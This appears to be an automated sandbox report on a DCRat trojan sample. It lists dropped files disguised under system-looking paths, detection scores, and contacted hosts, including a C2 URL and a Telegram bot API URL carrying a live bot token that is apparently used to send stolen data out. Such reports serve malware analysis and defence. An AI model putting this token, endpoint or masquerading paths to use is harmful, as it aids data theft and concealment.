C:\Program Files (x86)\Windows Defender\services.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\TQvqMYlM.log	100%	Joe Sandbox ML
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\SHKzphsQ.log	100%	Joe Sandbox ML
C:\Windows\Registration\csrss.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\services.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Defender\services.exe	65%	Virustotal		Browse
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe	65%	Virustotal		Browse
C:\Recovery\XXPWErhsUbDrk.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\XXPWErhsUbDrk.exe	65%	Virustotal		Browse
C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	65%	Virustotal		Browse
C:\Users\user\Desktop\DtICHrzA.log	17%	ReversingLabs
C:\Users\user\Desktop\DtICHrzA.log	25%	Virustotal		Browse
C:\Users\user\Desktop\EqkKdrOv.log	67%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EqkKdrOv.log	69%	Virustotal		Browse
C:\Users\user\Desktop\SHKzphsQ.log	8%	ReversingLabs
C:\Users\user\Desktop\SHKzphsQ.log	10%	Virustotal		Browse
C:\Users\user\Desktop\TQvqMYlM.log	8%	ReversingLabs
C:\Users\user\Desktop\TQvqMYlM.log	10%	Virustotal		Browse
C:\Users\user\Desktop\VaRrMrQM.log	0%	ReversingLabs
C:\Users\user\Desktop\VaRrMrQM.log	1%	Virustotal		Browse
C:\Users\user\Desktop\cvopZsny.log	0%	ReversingLabs
C:\Users\user\Desktop\cvopZsny.log	1%	Virustotal		Browse
C:\Users\user\Desktop\fJkHwTWu.log	12%	ReversingLabs
C:\Users\user\Desktop\fJkHwTWu.log	20%	Virustotal		Browse
C:\Users\user\Desktop\mqRpKNWg.log	17%	ReversingLabs
C:\Users\user\Desktop\mqRpKNWg.log	25%	Virustotal		Browse
C:\Users\user\Desktop\nntxgNlb.log	67%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\nntxgNlb.log	69%	Virustotal		Browse
C:\Users\user\Desktop\uCFUtfTN.log	12%	ReversingLabs
C:\Users\user\Desktop\uCFUtfTN.log	20%	Virustotal		Browse
C:\Windows\Registration\csrss.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Registration\csrss.exe	65%	Virustotal		Browse
C:\portintosvc\driverInto.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\portintosvc\driverInto.exe	65%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
intopart.top	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://intopart.top/Eternalpollgeocpu.php	0%	Avira URL Cloud	safe
http://intopart.top/Eternalpollgeocpu.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.186.192	true	false		high
api.telegram.org	149.154.167.220	true	false		high
intopart.top	172.67.144.153	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto	false		high
http://intopart.top/Eternalpollgeocpu.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/country	false		high
https://ipinfo.io/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://api.telegram.org	driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.telegram.org/bot	driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp, VaRrMrQM.log.25.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipinfo.io	driverInto.exe, 00000004.00000002.1887420284.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000001A.00000003.2074424875.00000155534D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://api.telegram.org/bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhotoX	driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io	driverInto.exe, 00000004.00000002.1887420284.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	false		high
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3224549621.000002616E484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.144.153	intopart.top	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433033
Start date and time:	2024-04-29 01:01:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Vqzx4PFehn.exe renamed because original name is a hash value
Original Sample Name:	1925339cab9e6a65f43c5f04321156e2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@38/290@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 62% Number of executed functions: 144 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.196.50.101
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:02:09	API Interceptor	31x Sleep call for process: driverInto.exe modified
01:02:17	API Interceptor	104x Sleep call for process: powershell.exe modified
01:02:34	API Interceptor	79744x Sleep call for process: XXPWErhsUbDrk.exe modified
01:02:35	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	uUsgzQ3DoW.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
	8BZBgbeCcz.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
149.154.167.220	stage3_muthal.bin.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	rdekont_20240424_388993774837743.exe	Get hash	malicious	AgentTesla	Browse
	PO-inv-CQV20(92315).exe	Get hash	malicious	AgentTesla	Browse
	o3KyzpE7F4.ps1	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse
172.67.144.153	https://hp.com@7a4934b5.75f9cba4c4b98762485a1fd9.workers.dev	Get hash	malicious	HTMLPhisher	Browse
172.67.144.153	https://hp.com@7a4934b5.75f9cba4c4b98762485a1fd9.workers.dev/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	Launcher.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	j1zkOQTx4q.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, zgRAT	Browse	34.117.186.192
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	34.117.186.192
	http://crunchersflowdigital.com	Get hash	malicious	Unknown	Browse	34.117.186.192
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	34.117.186.192
api.telegram.org	stage3_muthal.bin.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	rdekont_20240424_388993774837743.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PO-inv-CQV20(92315).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	o3KyzpE7F4.ps1	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	stage3_muthal.bin.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	rdekont_20240424_388993774837743.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PO-inv-CQV20(92315).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	o3KyzpE7F4.ps1	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	http://rfpteams.ksplastlc.net	Get hash	malicious	Unknown	Browse	149.154.167.99
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file300un.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	w0rLhtV1ui.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar	Browse	34.117.186.192
	Launcher.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	Mp7cjtN6To.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	34.117.186.192
	MwPM17s9Mb.elf	Get hash	malicious	Mirai	Browse	34.116.216.161
	O93vO719Sn.elf	Get hash	malicious	Unknown	Browse	34.118.34.88
	fwkeLXlthW.elf	Get hash	malicious	Unknown	Browse	34.117.172.118
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
CLOUDFLARENETUS	https://www.steam.workshopslist.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://villademacotera.com/card	Get hash	malicious	Unknown	Browse	104.21.67.8
	https://snog7sud46p5082i.azureedge.net/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://apptttt7.z19.web.core.windows.net/Win0security-helpline07/index.html?ph0n=+1-000-000-0000	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
	https://steam.workshopsharedfil.com/sharedfiles	Get hash	malicious	Unknown	Browse	172.67.202.46
	https://pub-d90b4e6b37254e1687ebe94c4d177a68.r2.dev/ADOBE%281%29.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://26apmic12.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	172.67.38.66
	https://farmacia-galindo.es/DHL/	Get hash	malicious	Unknown	Browse	104.18.10.207
	clik.exe	Get hash	malicious	CredGrabber, PureLog Stealer	Browse	172.67.74.152
	leadiadequatepro.exe	Get hash	malicious	CredGrabber, PureLog Stealer	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Order PS24S0040.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	34.117.186.192 149.154.167.220
	FastExecuteScript.exe	Get hash	malicious	Unknown	Browse	34.117.186.192 149.154.167.220
	eqmq0pcp.yew(1).exe	Get hash	malicious	Xmrig	Browse	34.117.186.192 149.154.167.220
	Ro8zgGY3GZ.exe	Get hash	malicious	PureLog Stealer	Browse	34.117.186.192 149.154.167.220
	Shipment Receipts20240425.vbs	Get hash	malicious	Unknown	Browse	34.117.186.192 149.154.167.220
	New Order NO-19006022.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	34.117.186.192 149.154.167.220
	lIoOSFYisn.exe	Get hash	malicious	Unknown	Browse	34.117.186.192 149.154.167.220
	SecuriteInfo.com.Trojan.DownLoader46.60844.7642.4031.exe	Get hash	malicious	AgentTesla	Browse	34.117.186.192 149.154.167.220
	Zuma Deluxe.exe	Get hash	malicious	Phemedrone Stealer	Browse	34.117.186.192 149.154.167.220
	jntCsdPYve.exe	Get hash	malicious	PureLog Stealer	Browse	34.117.186.192 149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\DtICHrzA.log	svchost.exe	Get hash	malicious	DCRat	Browse
	T7Em03jTPA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	yAxKsVPj6r.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	dump.bin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8sxCALaAMG.exe	Get hash	malicious	DCRat	Browse
	YLICY3GBmX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	yX8787W7de.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
